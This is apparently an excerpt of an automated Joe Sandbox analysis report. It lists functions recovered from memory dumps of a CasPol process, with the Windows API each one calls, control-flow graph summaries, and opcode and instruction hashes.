                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: 3786ad749c3d27977ff9a30e02ff44e663e7264ced2ba86f3c93c6adf77b4fc1
                                                                                                                                                                                                                                                    • Instruction ID: 13d3fe764ab38041e89712886ad516622f1c4a7bf5147a23b3ad5c1cc6e56856
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3786ad749c3d27977ff9a30e02ff44e663e7264ced2ba86f3c93c6adf77b4fc1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B21E3B5D00259AFDB10CFAAD884AEEBBF5EB48310F14841AE914A7350D378A940CF65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06223AE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1112 6223ae0-6223b74 DuplicateHandle 1113 6223b76-6223b7c 1112->1113 1114 6223b7d-6223b9a 1112->1114 1113->1114
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06223B67
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: 22bb60147a34672f2d39a2e94d9c9d61093055e629f7899adff27503db853036
                                                                                                                                                                                                                                                    • Instruction ID: 56198a4cf3f4b9e0a53617697724b8313ad081de802f758cc604257fd3333c0d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22bb60147a34672f2d39a2e94d9c9d61093055e629f7899adff27503db853036
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21E4B5D00359AFDB10CFAAD884BDEBBF4EB48310F14841AE914A3350C378A940CF64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0144F457 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1126 144f457-144f4e4 GlobalMemoryStatusEx 1129 144f4e6-144f4ec 1126->1129 1130 144f4ed-144f515 1126->1130 1129->1130
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0144F4D7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: cb62c25e94429ef6a01aade22cf71710ced06f982d5036fade8a6a220618e082
                                                                                                                                                                                                                                                    • Instruction ID: f23d0748ef365be1c0e403fb4dc40eb7e26cdef3c0f3b7b8f21fa210e97e4350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb62c25e94429ef6a01aade22cf71710ced06f982d5036fade8a6a220618e082
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 512164B2C0025A9FDB10CFAAD944BDEFBB4BF48210F14816AD818B7351C378A945CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 01447790 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1117 1447790-1448892 1120 1448894-1448897 1117->1120 1121 144889a-14488c5 DeleteFileW 1117->1121 1120->1121 1122 14488c7-14488cd 1121->1122 1123 14488ce-14488f6 1121->1123 1122->1123
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 014488B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 1bf6bfef1e0be7a351ac711b42a8792f9049f74538ff09e9706d8633c71caded
                                                                                                                                                                                                                                                    • Instruction ID: ca6e7d5dc2a2a1f7881472ae75f6fbae9238d6416ceeb97f989567d4851b4b55
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bf6bfef1e0be7a351ac711b42a8792f9049f74538ff09e9706d8633c71caded
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A22158B2C0061A9BEB14CF9AD4447EEFBF4EF48310F10812AE918A7350D374A945CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0622C1FB Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0622C079,00000800,00000000,00000000), ref: 0622C26A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: b3a392405aa9d3184defc687e6450eabd793d0bd8a60ce7bbd8755e59c26f7a9
                                                                                                                                                                                                                                                    • Instruction ID: bd63a5faa5be8b0d4294060b32a131ce045462962bbd01084309ca4a65f7da0f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3a392405aa9d3184defc687e6450eabd793d0bd8a60ce7bbd8755e59c26f7a9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A01137B6D0035A9FDB20DF9AC844BDEFBF4EB88310F14852AD819A7600C775A545CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 01448841 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 014488B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: c1b8483596c12d04a7295456611b830ebb8009689d2093df53288b438f8d701e
                                                                                                                                                                                                                                                    • Instruction ID: 2104620360f31a38cd70a4dfb4f720c74fce99e49bbe3d8b070e970baed126c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1b8483596c12d04a7295456611b830ebb8009689d2093df53288b438f8d701e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 582124B6C0061A9BEB14CF9AD5457EEFBB4FF48320F14852AD918A7350D338A945CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0622AD50 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0622C079,00000800,00000000,00000000), ref: 0622C26A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d815656cb76a88485d9472a58bcd0487e67793b3c00f9d3ae166ae69a9fd05b
                                                                                                                                                                                                                                                    • Instruction ID: 13a2fb3284325957eadc8dd25319dccf27264c5553d2f285e03cb952a32807cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d815656cb76a88485d9472a58bcd0487e67793b3c00f9d3ae166ae69a9fd05b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 751144B6D043499FDB20CF9AC844BDEFBF4EB88310F10852AE919A7600C375A945CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0144F470 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0144F4D7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: a3a127a6f624b30551ca84521a8242736db8c4daeb115452f21cc7fddaf3bba7
                                                                                                                                                                                                                                                    • Instruction ID: e4ccc010fde04855b9128311ad3c0aba31871aadc3234a81e35cc4a7e2c097b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3a127a6f624b30551ca84521a8242736db8c4daeb115452f21cc7fddaf3bba7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A71123B1C002599BDB20CF9AD444BDEFBF4EF48220F14812AD818A7250D778A944CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0622BF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0622BFFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: cb4b368d8d1b98282ebd3358778340996d324e3ca6ce6381c5a6cde788dccfd6
                                                                                                                                                                                                                                                    • Instruction ID: a9b5edc46a1b2e56b5063b5f592bd9f1b6fabed4ffdca278eb6931a2757f0200
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb4b368d8d1b98282ebd3358778340996d324e3ca6ce6381c5a6cde788dccfd6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C71113B6D0034A9FCB20CF9AC844BDEFBF4EB88314F10841AD819A7210C375A545CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624FECA Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: 4ad9d532b750c6a062625b80bc40d58b59cccd1db322fdbaa1ade0edfe020431
                                                                                                                                                                                                                                                    • Instruction ID: b45c75e8389a01ce38c6a233f22349d27c5ee7e8d39351d379b427263917b03b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ad9d532b750c6a062625b80bc40d58b59cccd1db322fdbaa1ade0edfe020431
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92113A75F54210DFDB549F789905B6E7BF2AB8C610F104469E90AE73A0DB799900CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624FED8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: c4da0b644d9da720f846b91b0080b3946daad2b054c032c1e19f154d1d8c370c
                                                                                                                                                                                                                                                    • Instruction ID: 3d47de3d285b87522bf60c9a0ae54c79d04f91f4f1e3ae262e7d1d6c228fe54c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4da0b644d9da720f846b91b0080b3946daad2b054c032c1e19f154d1d8c370c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E114C74B14224DFDB44EB789805B6EBBF5AF88600F104469E90AD73A0DB759D00CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624CF38 Relevance: .8, Instructions: 799COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5e00bd2b6c6ef71f1b0d5e2a9aa95a722a0005155d3fef5fe47d0d29249dab57
                                                                                                                                                                                                                                                    • Instruction ID: 7f40cb5cba9745943e5f035971f89427bad1d5c9ecf0569fa246c2227e78a8bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e00bd2b6c6ef71f1b0d5e2a9aa95a722a0005155d3fef5fe47d0d29249dab57
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D629B70B1030A8FCB55EB68E494A5EB7A6FF85300B60CA68C4069F355DB75EC86CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624ACC0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c69fd2a525bf99c334dd9fb55e51394ae4427c7e8c5e02da7ea5f3c448ca42d0
                                                                                                                                                                                                                                                    • Instruction ID: 33f9f1bda2480e4e8d9f1f7c84409c8fa4d98e50a3c9bd73daa9de5f7d6125df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c69fd2a525bf99c334dd9fb55e51394ae4427c7e8c5e02da7ea5f3c448ca42d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE18130F2030A8FDB59EB69D4806AEB7B2FF85300F508529D816AB344DB75DC46CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624B217 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 078cad2f821f1d5374019164e28aff12f92bed7f6dac13251af537e011cdfa39
                                                                                                                                                                                                                                                    • Instruction ID: 8f1da421b3400864b90b4226e06604a2706e0d993c4db76d787fbf74016a036a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 078cad2f821f1d5374019164e28aff12f92bed7f6dac13251af537e011cdfa39
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4A1B770F1020A8FEF68EB6DD4947AEB7B6FB85351F608429E845E7781CA34DC818B51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062442A8 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e6eb3adad710caea314ad6a792cb1ae9df30e71db805a1a101e5027a5ac00845
                                                                                                                                                                                                                                                    • Instruction ID: a2367397a3c13c85e3410c1c70fe9b3c3cd9f0d7c53aa0d65245a2f372a64b4d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6eb3adad710caea314ad6a792cb1ae9df30e71db805a1a101e5027a5ac00845
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4814070B102058FDF58EFA9D45479E7BE2FB88300F208529D819EB395EE34DC418B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062442B8 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 17c220ba9aec6397bc0fb2f09c670821f21845e01ebffb1074926b6fbf90319d
                                                                                                                                                                                                                                                    • Instruction ID: 04bb405137ea187e65b39712473378e2af993fe9883ec3e023d7ffb5eac4ac2d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17c220ba9aec6397bc0fb2f09c670821f21845e01ebffb1074926b6fbf90319d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9812F70B102058FDF58EFA9D4547AE7BE2FB89740F208529D80AEB345DE75DC418B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624EB01 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 35f2179ba6328fd64232976eae66e99a91374909f08f743a20de9a569c85f004
                                                                                                                                                                                                                                                    • Instruction ID: 8b126289a6dc99c29774e8f52da01d607a0c68ad7bfac91c3c87a1afd730776f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35f2179ba6328fd64232976eae66e99a91374909f08f743a20de9a569c85f004
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F715C70A102098FEB58EFA8D984A9DBBF6FF84300F158529D856EB354DB30EC46CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624EB10 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5be57a3298c6b0a6cd5e2fa6da306c9a115b25b9e005c3f100ebe8f55391ac4a
                                                                                                                                                                                                                                                    • Instruction ID: d11b0345fb25482207186e22bafc759fcfb7031bb9fa5f95dbf99d713cf9acc2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be57a3298c6b0a6cd5e2fa6da306c9a115b25b9e005c3f100ebe8f55391ac4a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44714C70A102098FEB58EFA9D880A9DBBF6FF84300F158429D856AB354DB30EC46CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06244B70 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ddb04defe51b0fc80ba173a1adb4165dba911608df44b1e295f5ef05784bf86e
                                                                                                                                                                                                                                                    • Instruction ID: 1bd6700d986e28cf14dbcfa0f4ecebd78d4f75d9fa9fbdb24aba45b1af1cae00
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddb04defe51b0fc80ba173a1adb4165dba911608df44b1e295f5ef05784bf86e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F61A470F102199FEB54AFA8C4447AEBBF6FB88700F208429D506AB391DF704C018F91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624FC78 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e120e39b0541bd978c7ec406a3006e118213e53008139b785d81c0c9e2ffe052
                                                                                                                                                                                                                                                    • Instruction ID: 0bd4035200311d883683b27034a1fc3e270395ab0252bf555e9c75ae648f1e48
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e120e39b0541bd978c7ec406a3006e118213e53008139b785d81c0c9e2ffe052
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB51D231F1020ADFDB28FB78E5986ADB7B2FBC9311F108869E906D7250DB359845CB81
                                                                                                                                                                                                                                                    Uniqueness

